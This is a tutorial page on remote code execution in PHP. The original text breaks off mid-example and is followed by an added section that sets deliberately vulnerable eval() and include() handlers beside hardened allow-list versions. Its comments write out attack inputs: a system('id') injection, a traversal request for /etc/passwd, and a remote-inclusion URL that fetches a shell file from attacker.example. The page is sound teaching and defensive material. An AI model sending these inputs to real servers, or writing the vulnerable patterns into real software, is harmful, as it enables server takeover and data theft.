
RCE in PHP

Last Edit: 10-05-2024


Remote Code Execution (RCE) allows an attacker to run code of their choosing on a remote machine over the network. In PHP applications it usually results from code that passes user-controlled input, unvalidated, into functions that evaluate it as PHP code or use it to decide which file to load.

Common Sources of RCE Vulnerabilities in PHP

1. eval() Function

The eval() function in PHP evaluates a string as PHP code.

If user input reaches this function, an attacker can execute arbitrary PHP code on the server.

For example:

```php
$code = $_GET['code'];
eval($code);
```

Here, if an attacker passes PHP code through the code parameter in the URL, the server will execute it with the privileges of the web server process.

2. include() and require() Statements

These statements load and execute another PHP file at the point where they appear.

If the file name is built from unvalidated user input, an attacker can include local files they control or can write to (local file inclusion) and, when the allow_url_include setting is enabled, even files fetched from a remote server (remote file inclusion).

For example: php $file = $_GET['fil
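The two patterns above written out side by side with hardened versions, as an added example that is not part of the original chapter. The parameter names op, n and page, the list of allowed page names and the $baseDir argument are assumptions made for the illustration.

```php
<?php
// Added example, not from the original course page. Each handler below is
// written the way the chapter describes (vulnerable), followed by a hardened
// variant. Parameter names "op", "n", "page" and the page list are assumptions.

// --- 1. eval() ------------------------------------------------------------

// Vulnerable: whatever the client sends in ?code= is compiled and executed,
// e.g. ?code=system('id'); runs a shell command as the web server user.
function vulnerable_eval(array $get): mixed
{
    $code = $get['code'] ?? '';
    return eval($code);            // attacker-controlled PHP source
}

// Hardened: never evaluate client input as code. Map a short list of
// allowed operation names to closures and reject anything else.
function safe_dispatch(array $get): mixed
{
    $ops = [
        'sum'   => fn(array $n) => array_sum($n),
        'count' => fn(array $n) => count($n),
    ];
    $op = $get['op'] ?? '';
    if (!isset($ops[$op])) {
        throw new InvalidArgumentException('unknown operation');
    }
    // Coerce every operand to an integer so no string reaches the closure.
    $nums = array_map('intval', (array)($get['n'] ?? []));
    return $ops[$op]($nums);
}

// --- 2. include() / require() ---------------------------------------------

// Vulnerable: ?file=../../../../etc/passwd reads arbitrary files (LFI), and
// with allow_url_include=On, ?file=http://attacker.example/shell.txt fetches
// and executes remote PHP (RFI). Any local file the attacker can write to,
// such as an upload or a log, becomes executable the same way.
function vulnerable_include(array $get): void
{
    include $get['file'];
}

// Hardened: map the request onto a fixed set of known files inside one
// directory, then verify the resolved path is still inside that directory.
function safe_include(array $get, string $baseDir): void
{
    $allowed = ['home', 'about', 'contact'];      // assumed page names
    $page = $get['page'] ?? 'home';
    if (!in_array($page, $allowed, true)) {
        http_response_code(404);
        return;
    }
    $path = realpath($baseDir . '/' . $page . '.php');
    $root = realpath($baseDir);
    // realpath() collapses ../ and symlinks; the prefix check guards
    // against a misconfigured $baseDir as well as a tampered allow-list.
    if ($path === false || $root === false
        || strncmp($path, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        http_response_code(404);
        return;
    }
    include $path;
}
```

The allow-list is the important part in both hardened versions: sanitising the input string (stripping "../", blocking "http://") is weaker because PHP also accepts wrappers such as php://filter and data:, and because encoding tricks bypass naive filters. Remote inclusion additionally depends on allow_url_include, which is off by default, but local inclusion needs no special configuration at all.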
